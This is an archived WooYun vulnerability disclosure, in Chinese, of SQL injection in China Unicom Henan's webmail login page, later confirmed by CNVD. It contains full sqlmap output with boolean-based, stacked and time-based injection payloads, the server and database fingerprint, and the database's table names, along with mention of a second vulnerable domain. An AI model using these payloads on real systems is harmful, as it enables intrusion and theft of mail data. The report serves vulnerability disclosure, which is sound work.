乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-05: 细节已通知厂商并且等待厂商处理中 2014-09-10: 厂商已经确认,细节仅向厂商公开 2014-09-20: 细节向核心白帽子及相关领域专家公开 2014-09-30: 细节向普通白帽子公开 2014-10-10: 细节向实习白帽子公开 2014-10-20: 细节向公众公开
首页全是电信和联通我也来个联通
中国联通河南省分公司邮件系统http://ha.mail.chinaunicom.cn/login.aspx
账号输入admin'
竟然报错
抓包
URL:http://ha.mail.chinaunicom.cn/login.aspxPOST data
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays%2BWNl%2BecgeWIhuWFrOWPuOeJiOadg%2BaJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb%2F6Q%3D%3D&__EVENTVALIDATION=%2FwEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD%2FHnmf%2FCEgrMwGNilWVVvtj5E5&txtUserName=a&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7
我一般变post为get拼写URL好吧就是这么长
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: txtUserName Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a' AND 8125=8125 AND 'rOiO'='rOiO&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a'; WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a' WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7---
web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
数据库
available databases [5]:[*] EXCHANGE[*] master[*] model[*] msdb[*] tempdb
Database: EXCHANGE[20 tables]+---------------------------+| AdminUsers || AutoForward || Contacts || Contacts_20130514_all_bak || Contacts_20130801_back || CustomGroup || DomainContacts || LockUsers || LoginErrorCount || MailBox || Orgs || ReportConfig || ReportPeriod || RootGroup || SMSConfig || Signature || Subscription || TimerMailAttachments || TimerMails || UserStatistic |+---------------------------+
还有http://ha.mail.cnc.cn/login.aspx和这个一样
输入万能密码提示 账号锁定
危害等级:高
漏洞Rank:11
确认时间:2014-09-10 09:00
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置。
暂无